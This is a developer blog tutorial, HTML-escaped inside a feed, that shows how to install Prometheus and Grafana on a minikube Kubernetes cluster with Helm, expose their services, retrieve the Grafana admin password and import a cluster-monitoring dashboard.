&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--x_58iR9F--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A6HfRs0R_3vookyvUI7u30Q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--x_58iR9F--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A6HfRs0R_3vookyvUI7u30Q.png" alt="" width="800" height="594"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Helm commands&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Here are the fundamental Helm commands:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;helm search:&lt;/strong&gt; Search for Helm Charts in the ArtifactHub repository.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;helm pull:&lt;/strong&gt; Retrieve and download a Helm Chart from the ArtifactHub repository.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;helm install:&lt;/strong&gt; Upload and deploy a Helm Chart to your Kubernetes cluster.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;helm list:&lt;/strong&gt; Display a list of all deployed Helm charts within your Kubernetes cluster.&lt;/li&gt;
&lt;/ol&gt;
&lt;h4&gt;
  
  
  Prometheus Helm Charts
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Let’s begin by searching for the Prometheus Helm Charts. To find the Prometheus Helm, use the following command:
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;helm search hub prometheus
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;The command lists the following Prometheus Helm Charts:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--QX5rimQO--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AUUmkrAN2kXkd9dKcHDbp-A.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--QX5rimQO--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AUUmkrAN2kXkd9dKcHDbp-A.png" alt="" width="800" height="594"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Prometheus Artifacts&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;You can also go to the &lt;a href="https://artifacthub.io/"&gt;ArtifactHub&lt;/a&gt; repository and search for the official Prometheus Helm Chart as shown in the image below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--oYtWcxwm--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A35Z4cbL9lUOia2kCzFpl0A.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--oYtWcxwm--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A35Z4cbL9lUOia2kCzFpl0A.png" alt="" width="800" height="379"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Artifacts site&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The first one on the list is the official Prometheus Helm Chart. To get this Helm chart, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;helm repo add prometheus-community https://prometheus-community.github.io/helm-charts
helm repo update
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Install Prometheus Helm Chart on Kubernetes Cluster
&lt;/h4&gt;

&lt;p&gt;To install Prometheus Helm Chart on Kubernetes Cluster, run this helm install command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;helm install prometheus prometheus-community/prometheus
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After successfully installing Prometheus on your Kubernetes Cluster, you can access the Prometheus server via port 80. The subsequent task is to inspect the Kubernetes resources that have been deployed. These resources consist of the pods and services generated by the Helm Chart within your Kubernetes cluster.&lt;/p&gt;

&lt;p&gt;To examine the deployed Kubernetes resources, execute the following kubectl command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl get all
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--MuJBgHC2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AgFWG1yFTKqYOYus-XjN7YA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--MuJBgHC2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AgFWG1yFTKqYOYus-XjN7YA.png" alt="" width="800" height="594"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The installation of the Helm Chart results in the creation of several essential Kubernetes resources, including:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Pods:&lt;/strong&gt; These pods host the Prometheus Kubernetes application within the cluster.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Replica Sets:&lt;/strong&gt; A collection of instances of the same application inside the Kubernetes cluster, enhancing application reliability.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Deployments:&lt;/strong&gt; These deployments serve as the blueprint for creating application pods.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Services&lt;/strong&gt; : Services are responsible for exposing the pods running within the Kubernetes cluster, allowing us to access the deployed Kubernetes application.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The subsequent action involves accessing and launching the Prometheus Kubernetes application. You can access the application through the Kubernetes services designated for Prometheus. To obtain a list of all the Kubernetes Services associated with Prometheus, execute the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl get service
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--D6pWvPmd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AckTLFziUyj_v7aRrXYRaSA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--D6pWvPmd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AckTLFziUyj_v7aRrXYRaSA.png" alt="" width="800" height="594"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Exposing the prometheus-server Kubernetes Service
&lt;/h4&gt;

&lt;p&gt;To expose the prometheus-server Kubernetes service, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl expose service prometheus-server --type=NodePort --target-port=9090 --name=prometheus-server-external
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command will convert the ClusterIP type to the NodePort type. It makes the prometheus-server accessible outside the Kubernetes Cluster on port 9090.&lt;/p&gt;

&lt;p&gt;Now we have exposed the prometheus-server Kubernetes service. Let’s access the Prometheus application using the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;minikube service prometheus-server-external
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Please be aware that it may require some time for the URL to become accessible. You might need to make multiple attempts in your web browser until you successfully access the Prometheus Kubernetes application through the provided URL. It’s important to keep the terminal open and the tunnel command running to ensure continuous access to the service.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s---wiJyRr9--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AaoRkovaS347o_UgRvkwL7w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s---wiJyRr9--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AaoRkovaS347o_UgRvkwL7w.png" alt="" width="800" height="352"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With Prometheus successfully installed on Kubernetes via Helm, Prometheus is up and running within the cluster, and it’s accessible through a browser via a URL. Moving on to the next steps in the tutorial:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;We will proceed to install Grafana.&lt;/li&gt;
&lt;li&gt;Subsequently, we’ll establish the integration between Prometheus and Grafana. Grafana will utilize Prometheus as its primary data source.&lt;/li&gt;
&lt;li&gt;Finally, we will employ Grafana to craft the dashboards essential for monitoring and observing the Kubernetes cluster.&lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  Install Grafana
&lt;/h4&gt;

&lt;p&gt;To install, we follow the same steps as those for installing Prometheus:&lt;/p&gt;

&lt;h4&gt;
  
  
  Search for Grafana Helm Charts
&lt;/h4&gt;

&lt;p&gt;To search for the Prometheus Helm charts, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;helm search hub grafana
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can also go to the ArtifactHub repository and search for the official Grafana Helm Chart as shown in the image below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--lYpppy3d--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A9L7riVPayN3bv_nssK5tag.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--lYpppy3d--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A9L7riVPayN3bv_nssK5tag.png" alt="" width="800" height="352"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To get this Grafana Helm chart, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;helm repo add grafana https://grafana.github.io/helm-charts 
helm repo update
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Install Grafana Helm Chart on Kubernetes Cluster
&lt;/h3&gt;

&lt;p&gt;You’ll run this helm install command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;helm install grafana grafana/grafana
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We have installed Grafana on the Kubernetes Cluster. We can access the Grafana server via port 80. The next step is to access and launch the Grafan application. You will access the application using the Kubernetes services for Grafana. To get all the Kubernetes Services for Grafana, run this command:kubectl get service&lt;/p&gt;

&lt;h4&gt;
  
  
  Exposing the grafana Kubernetes Service
&lt;/h4&gt;

&lt;p&gt;To expose the grafana Kubernetes service, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl expose service grafana --type=NodePort --target-port=3000 --name=grafana-ext
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command will convert the ClusterIP type to the NodePort type. It makes the grafana accessible outside the Kubernetes Cluster on port 3000. Now we have exposed the grafana Kubernetes service. Let’s access the Grafana application using the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;minikube service grafana-ext
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--qh_TjR3G--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ar1PImBF_DtVkHhw7dPWtSA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--qh_TjR3G--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ar1PImBF_DtVkHhw7dPWtSA.png" alt="" width="800" height="352"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The image above shows the Grafana Login page. To get the password for admin, run this command on a new terminal.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl get secret --namespace default grafana -o jsonpath="{.data.admin-password}" | base64 --decode ; echo
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Login into Grafana
&lt;/h4&gt;

&lt;p&gt;To login into Grafana, input admin as the user name and your generated password. It will launch a Welcome to Grafana home page as shown below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--EQCSwlFk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AJ8qLnciUqcpr7KXquoUITQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--EQCSwlFk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AJ8qLnciUqcpr7KXquoUITQ.png" alt="" width="800" height="352"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To add Prometheus as the data source. To add Prometheus as the data source, follow these steps:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;On the Welcome to Grafana Home page, click Add your first data source:&lt;/li&gt;
&lt;li&gt;Select Prometheus as the data source:&lt;/li&gt;
&lt;li&gt;You will then add the URL where your Prometheus application is running. This is the first URL (internal to the cluster) shown when we ran minikube service prometheus-server-external earlier.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--KbGgrkMR--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A69RFE1-74wOCYCbq6Fq7yA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--KbGgrkMR--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A69RFE1-74wOCYCbq6Fq7yA.png" alt="" width="800" height="352"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Click the “Save &amp;amp; test” button to preserve your modifications.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;With that, you have successfully completed the integration of Prometheus and Grafana on Kubernetes using Helm. The final phase involves crafting a Grafana Dashboard, a pivotal step in visualizing the metrics for your Kubernetes cluster.&lt;/p&gt;

&lt;h4&gt;
  
  
  Grafana Dashboard
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;As previously mentioned, you have the flexibility to either create your own dashboards from the ground up or import existing ones provided by Grafana. In this section, we’ll walk you through the process of importing a Grafana Dashboard. To import a Grafana Dashboard, follow these steps:&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Retrieve the Grafana Dashboard ID from the public &lt;strong&gt;Grafana Dashboard library.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://grafana.com/solutions/kubernetes/"&gt;Kubernetes Monitoring with Grafana&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;On this web page, search for Kubernetes:&lt;/li&gt;
&lt;li&gt;Scroll until you find the Kubernetes cluster monitoring (via Prometheus) dashboard&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ecskhs-y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ab8FpOMG1lS9S8yVUpn_YCA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ecskhs-y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ab8FpOMG1lS9S8yVUpn_YCA.png" alt="" width="800" height="352"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Select Dashboard and copy the Dashboard ID:&lt;/li&gt;
&lt;li&gt;Go Back to Grafana and click Home on the top left corner:&lt;/li&gt;
&lt;li&gt;It will display a menu.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;On the menu, click Dashboards&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Click New&lt;/li&gt;
&lt;li&gt;It will display three options: New Dashboard, New Folder and Import.&lt;/li&gt;
&lt;li&gt;Click Import&lt;/li&gt;
&lt;li&gt;dd the Grafana ID: You will add the Grafana ID that you have copied and click Load. The Grafana ID is 315.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Ij-X-Wsd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ARmug678YpE40t9va1AAzMQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Ij-X-Wsd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ARmug678YpE40t9va1AAzMQ.png" alt="" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It will the launch the Dashboard shown below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--z-LbXral--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A51KRx-pHmoCNB4Exk08U_w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--z-LbXral--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A51KRx-pHmoCNB4Exk08U_w.png" alt="" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--iXVVU7f1--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Abg-U2_ad7_46tGNvcG9jbw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--iXVVU7f1--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Abg-U2_ad7_46tGNvcG9jbw.png" alt="" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;You use this dashboard to monitor and observe the Kubernetes cluster metrics. It displays the following Kubernetes cluster metrics:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Network I/O pressure.&lt;/li&gt;
&lt;li&gt;Cluster CPU usage.&lt;/li&gt;
&lt;li&gt;Cluster Memory usage.&lt;/li&gt;
&lt;li&gt;Cluster filesystem usage.&lt;/li&gt;
&lt;li&gt;Pods CPU usage.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Advantages of Configuring Prometheus and Grafana for Container Orchestration Platform Monitoring
&lt;/h4&gt;

&lt;p&gt;The deployment of Prometheus and Grafana for monitoring purposes offers several notable benefits:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;It delivers a comprehensive, all-encompassing solution for monitoring and overseeing a Kubernetes cluster.&lt;/li&gt;
&lt;li&gt;You gain the capability to perform metric queries using Prometheus’s PromQL query language, facilitating in-depth analysis.&lt;/li&gt;
&lt;li&gt;In the context of a microservices architecture, Prometheus efficiently tracks all your microservices concurrently, ensuring no aspect goes unmonitored.&lt;/li&gt;
&lt;li&gt;Immediate alerts are triggered when a service encounters a failure, allowing for swift corrective actions.&lt;/li&gt;
&lt;li&gt;The Grafana dashboard provides comprehensive performance and health reports for your clusters, offering valuable insights and visual representations of your system’s state.&lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  Conclusion
&lt;/h4&gt;

&lt;p&gt;In this comprehensive guide, you’ve acquired the knowledge needed to seamlessly integrate Prometheus and Grafana into your Kubernetes environment using Helm. Furthermore, you’ve gained insights into creating a straightforward dashboard in Grafana, enabling you to monitor resource utilization and performance metrics across your Kubernetes cluster.&lt;/p&gt;

&lt;p&gt;Monitoring plays a pivotal role in DevOps, ensuring that you maintain visibility into your Kubernetes cluster and the performance of microservices. Implementing these practices is essential for real-time updates on your cluster’s health, allowing you to stay informed about its current status.&lt;/p&gt;

&lt;p&gt;That brings us to the conclusion of this Prometheus and Grafana guide. Thank you for reading, and here’s to your continued learning and success!&lt;/p&gt;

</description>
      <category>docker</category>
      <category>devops</category>
      <category>prometheus</category>
      <category>grafana</category>
    </item>
  </channel>
</rss>
